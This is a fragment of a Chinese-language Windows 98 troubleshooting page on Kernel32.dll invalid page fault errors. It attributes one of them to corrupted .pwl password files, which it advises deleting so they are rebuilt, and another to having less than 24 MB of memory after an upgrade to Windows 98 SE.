· Explorer caused an invalid page fault in module Kernel32.dll.
· Commgr32 caused an invalid page fault in module Kernel32.dll.
· Mprexe caused an invalid page fault in module Kernel32.dll.
· Msgsrv32 caused an invalid page fault in module Kernel32.dll.
3、原因:PWL 文件损坏,.pwl 就是操作系统用以储存密码的文件。
4、排除方法:找出所有的 .pwl 档案,并把它们删除,重新激活你的计算机,当你再次 login
的时候,无论是否输入密码(密码空白),操作系统会自己重建新的 .pwl 档案。
23、Mprexe Caused an Invalid Page Fault in Module Kernel32.dll at 0167:bff719d1
1、适用范围:Windows 98 SE (第二版)
2、症状和原因:在你从 Windows 98 升级到 Windows 98 SE 之后,如果出下面这个信息:
Mprexe Caused an Invalid Page Fault in Module Kernel32.dll at 0167:bff719d1
这是代表你的内存不够,少于 24 MB,升级到 Windows 98 SE 至少需要 24 MB 的内存. |
|
设为首页
加入收藏
联系我们
打印本文 
返回顶部 
加入收藏 
关闭窗口